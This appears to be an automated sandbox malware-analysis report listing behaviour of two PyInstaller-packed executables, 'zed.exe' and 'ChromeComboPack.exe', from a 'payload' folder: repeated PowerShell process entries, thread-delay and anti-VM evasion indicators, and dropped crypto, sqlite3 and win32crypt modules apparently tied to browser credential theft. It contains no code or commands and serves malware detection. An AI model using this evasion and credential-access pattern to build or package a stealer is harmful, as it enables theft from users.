Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344D27D5 sldt word ptr [eax]0_2_00007FFD344D27D5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5348Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4439Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 2067Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2506
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 873
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 840
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 484
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2456
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 367
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2384
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_hashlib.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\select.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_asyncio.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\python312.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\pyexpat.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_bz2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_ctypes.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_curve448.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_queue.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_curve25519.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_asyncio.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_hashlib.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_overlapped.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\python3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_queue.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_bz2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_tkinter.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_ssl.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_ssl.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_asyncio.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_lzma.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_curve448.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_overlapped.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\python312.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\win32\win32crypt.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_wmi.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_decimal.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\_ssl.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\python3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\_ctypes.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\_socket.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22602\pyexpat.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_BLAKE2s.pydJump to dropped file
